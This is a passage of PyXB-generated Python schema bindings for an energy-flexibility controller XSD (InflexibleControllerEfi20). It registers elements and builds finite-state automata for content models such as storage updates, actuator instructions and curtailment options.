CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUnit'), pyxb.binding.datatypes.string, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 416, 6)))
CTD_ANON_27._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuators'), Actuators, scope=CTD_ANON_27, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 417, 6)))
def _BuildAutomaton_67 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_67
    del _BuildAutomaton_67
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    def _state(tag, line, col, initial=False, final=False):
        # Build the FAC state that matches element *tag*, declared at
        # (line, col) in the schema; only the last element is accepting.
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_27._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        return fac.State(symbol, is_initial=initial,
                         final_update=(set() if final else None),
                         is_unordered_catenation=False)
    # 'currency' is optional (0..1); its occurrence is tracked by a counter.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(_XSD, 48, 5))
    counters = set([cc_0])
    st_0 = _state('header', 24, 3, initial=True)
    st_1 = _state('instructionProcessingDelay', 46, 5)
    st_2 = _state('deviceDescription', 47, 5)
    st_3 = _state('currency', 48, 5)
    st_4 = _state('fillLevelLabel', 415, 6)
    st_5 = _state('fillLevelUnit', 416, 6)
    st_6 = _state('actuators', 417, 6, final=True)
    states = [st_0, st_1, st_2, st_3, st_4, st_5, st_6]
    st_0._set_transitionSet([fac.Transition(st_1, [])])
    st_1._set_transitionSet([fac.Transition(st_2, [])])
    # After deviceDescription the optional currency may be skipped entirely.
    st_2._set_transitionSet([fac.Transition(st_3, []),
                             fac.Transition(st_4, [])])
    st_3._set_transitionSet([
        fac.Transition(st_3, [fac.UpdateInstruction(cc_0, True)]),
        fac.Transition(st_4, [fac.UpdateInstruction(cc_0, False)])])
    # Remaining elements form a straight-line chain to the accepting state.
    st_4._set_transitionSet([fac.Transition(st_5, [])])
    st_5._set_transitionSet([fac.Transition(st_6, [])])
    st_6._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_27._Automaton = _BuildAutomaton_67()
def _BuildAutomaton_68 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_68
    del _BuildAutomaton_68
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('flexibilityUpdateId', 57, 5),
               ('validFrom', 58, 5)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(StorageUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
StorageUpdate._Automaton = _BuildAutomaton_68()
CTD_ANON_28._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstructions'), ActuatorInstructions, scope=CTD_ANON_28, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 807, 6)))
def _BuildAutomaton_69 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_69
    del _BuildAutomaton_69
    import pyxb.utils.fac as fac
    _XSD = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    counters = set()
    # Required elements in fixed document order; only the last is accepting.
    _layout = [('header', 24, 3),
               ('instructionId', 67, 5),
               ('flexibilityUpdateId', 68, 5),
               ('isEmergencyInstruction', 69, 5),
               ('actuatorInstructions', 807, 6)]
    states = []
    for pos, (tag, line, col) in enumerate(_layout):
        symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(_XSD, line, col))
        states.append(fac.State(symbol, is_initial=(pos == 0),
                                final_update=(set() if pos == len(_layout) - 1 else None),
                                is_unordered_catenation=False))
    # Straight-line chain: each state advances only to its successor.
    for current, following in zip(states, states[1:]):
        current._set_transitionSet([fac.Transition(following, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_28._Automaton = _BuildAutomaton_69()
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), SupportedCommodities, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6)))
def _BuildAutomaton_70 ():
    """Build the FAC automaton for CTD_ANON_29's content model.

    Sequence: header, instructionProcessingDelay, deviceDescription, an
    optional 'currency' (occurrence tracked by counter cc_0), ending with
    'supportedCommodities'.  PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_70
    del _BuildAutomaton_70
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 48 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currency')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 48, 5))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Only the last state may terminate a match (non-None final-update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 818, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    # From deviceDescription: either consume the optional currency (st_3)
    # or skip straight to supportedCommodities (st_4).
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_29.
CTD_ANON_29._Automaton = _BuildAutomaton_70()
def _BuildAutomaton_71 ():
    """Construct the content-model automaton for AdjustableUpdate.

    The model is a strict sequence: header, flexibilityUpdateId,
    validFrom.  Only the final element's state may terminate a match.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_71
    del _BuildAutomaton_71
    import pyxb.utils.fac as fac
    schema_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, xsd line, xsd column) in the order the schema requires.
    element_sequence = [
        ('header', 24, 3),
        ('flexibilityUpdateId', 57, 5),
        ('validFrom', 58, 5),
    ]
    states = []
    terminal_index = len(element_sequence) - 1
    for position, (tag, line, column) in enumerate(element_sequence):
        element_use = pyxb.binding.content.ElementUse(
            AdjustableUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(schema_path, line, column))
        # Only the terminal state carries a (counter-free) final-update set.
        states.append(fac.State(element_use,
                                is_initial=(position == 0),
                                final_update=(set() if position == terminal_index else None),
                                is_unordered_catenation=False))
    # Linear chain: each state's only transition leads to its successor.
    for current_state, next_state in zip(states, states[1:]):
        current_state._set_transitionSet([fac.Transition(next_state, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, set(), False, containing_state=None)
# Attach the content-model automaton to AdjustableUpdate.
AdjustableUpdate._Automaton = _BuildAutomaton_71()
# Register CTD_ANON_30's child elements, generated from the XSD element declarations.
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_3, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6)))
def _BuildAutomaton_72 ():
    """Build the FAC automaton for CTD_ANON_30's content model.

    Sequence: header, instructionId, flexibilityUpdateId,
    isEmergencyInstruction, runningModeId, an optional runningModeFactor
    (occurrence tracked by counter cc_0), ending with startTime.
    PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_72
    del _BuildAutomaton_72
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 924 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 67, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 68, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isEmergencyInstruction')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 69, 5))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 923, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 924, 6))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # Only the last state may terminate a match (non-None final-update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 932, 6))
    st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    # From runningModeId: either consume the optional runningModeFactor (st_5)
    # or skip straight to startTime (st_6).
    transitions.append(fac.Transition(st_5, [
        ]))
    transitions.append(fac.Transition(st_6, [
        ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    st_6._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_30.
CTD_ANON_30._Automaton = _BuildAutomaton_72()
# Register CTD_ANON_31's 'forecastProfiles' child element (typed ProfileContainer).
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'forecastProfiles'), ProfileContainer, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 285, 6)))
def _BuildAutomaton_73 ():
    """Construct the content-model automaton for CTD_ANON_31.

    The model is a strict sequence: header, flexibilityUpdateId,
    validFrom, forecastProfiles.  Only the final element's state may
    terminate a match.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_73
    del _BuildAutomaton_73
    import pyxb.utils.fac as fac
    schema_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, xsd line, xsd column) in the order the schema requires.
    ordered_elements = [
        ('header', 24, 3),
        ('flexibilityUpdateId', 57, 5),
        ('validFrom', 58, 5),
        ('forecastProfiles', 285, 6),
    ]
    states = []
    last = len(ordered_elements) - 1
    for idx, (tag, line, column) in enumerate(ordered_elements):
        use = pyxb.binding.content.ElementUse(
            CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(schema_path, line, column))
        # Terminal state gets an empty final-update set; others get None.
        states.append(fac.State(use,
                                is_initial=(idx == 0),
                                final_update=(set() if idx == last else None),
                                is_unordered_catenation=False))
    # Wire the strictly linear chain of transitions.
    for state, successor in zip(states, states[1:]):
        state._set_transitionSet([fac.Transition(successor, [])])
    states[-1]._set_transitionSet([])
    return fac.Automaton(states, set(), False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_31.
CTD_ANON_31._Automaton = _BuildAutomaton_73()
# Register CTD_ANON_32's 'curtailmentOptions' child element (typed CurtailmentOptions).
CTD_ANON_32._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions'), CurtailmentOptions, scope=CTD_ANON_32, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6)))
def _BuildAutomaton_74 ():
    """Build the FAC automaton for CTD_ANON_32's content model.

    Sequence: header, flexibilityUpdateId, validFrom, then an optional
    trailing 'curtailmentOptions' whose occurrence is tracked by counter
    cc_0.  Matching may end after validFrom or after curtailmentOptions.
    PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_74
    del _BuildAutomaton_74
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 312 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # validFrom may end the match (the trailing element below is optional).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # Ending here must also finalize counter cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    # Self-loop on the optional element; cc_0 enforces its occurrence bound.
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_3._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_32.
CTD_ANON_32._Automaton = _BuildAutomaton_74()
# Register CTD_ANON_33's child elements, generated from the XSD element declarations.
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours'), ActuatorBehaviours, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6)))
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour'), LeakageFunction, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6)))
def _BuildAutomaton_75 ():
    """Build the FAC automaton for CTD_ANON_33's content model.

    Sequence: header, flexibilityUpdateId, validFrom, actuatorBehaviours,
    then an optional trailing 'leakageBehaviour' tracked by counter cc_0.
    Matching may end after actuatorBehaviours or after leakageBehaviour.
    PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_75
    del _BuildAutomaton_75
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 686 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # actuatorBehaviours may end the match (the trailing element is optional).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Ending here must also finalize counter cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    # Self-loop on the optional element; cc_0 enforces its occurrence bound.
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_33.
CTD_ANON_33._Automaton = _BuildAutomaton_75()
# Register CTD_ANON_34's child elements, generated from the XSD element declarations.
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel'), pyxb.binding.datatypes.double, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6)))
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses'), ActuatorStatuses, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6)))
def _BuildAutomaton_76 ():
    """Build the FAC automaton for CTD_ANON_34's content model.

    Sequence: header, flexibilityUpdateId, validFrom, currentFillLevel,
    then an optional trailing 'actuatorStatuses' tracked by counter cc_0.
    Matching may end after currentFillLevel or after actuatorStatuses.
    PyXB-generated; do not edit by hand.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_76
    del _BuildAutomaton_76
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 bounds the optional element declared at xsd line 736 (min 0, max 1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6))
    counters.add(cc_0)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # currentFillLevel may end the match (the trailing element is optional).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Ending here must also finalize counter cc_0.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    # Self-loop on the optional element; cc_0 enforces its occurrence bound.
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the content-model automaton to CTD_ANON_34.
CTD_ANON_34._Automaton = _BuildAutomaton_76()
# Register CTD_ANON_35's 'targetProfile' child element (typed TargetProfile).
CTD_ANON_35._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetProfile'), TargetProfile, scope=CTD_ANON_35, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 758, 6)))
def _BuildAutomaton_77 ():
    """Construct the content-model automaton for CTD_ANON_35.

    The model is a strict sequence: header, flexibilityUpdateId,
    validFrom, targetProfile.  Only the final element's state may
    terminate a match.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_77
    del _BuildAutomaton_77
    import pyxb.utils.fac as fac
    schema_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, xsd line, xsd column) in the order the schema requires.
    chain = [
        ('header', 24, 3),
        ('flexibilityUpdateId', 57, 5),
        ('validFrom', 58, 5),
        ('targetProfile', 758, 6),
    ]
    states = []
    final_position = len(chain) - 1
    for index, (tag, line, column) in enumerate(chain):
        element_use = pyxb.binding.content.ElementUse(
            CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)),
            pyxb.utils.utility.Location(schema_path, line, column))
        # Terminal state gets an empty final-update set; others get None.
        states.append(fac.State(element_use,
                                is_initial=(index == 0),
                                final_update=(set() if index == final_position else None),
                                is_unordered_catenation=False))
    # Each state transitions only to the next element in the sequence.
    for state, successor in zip(states, states[1:]):
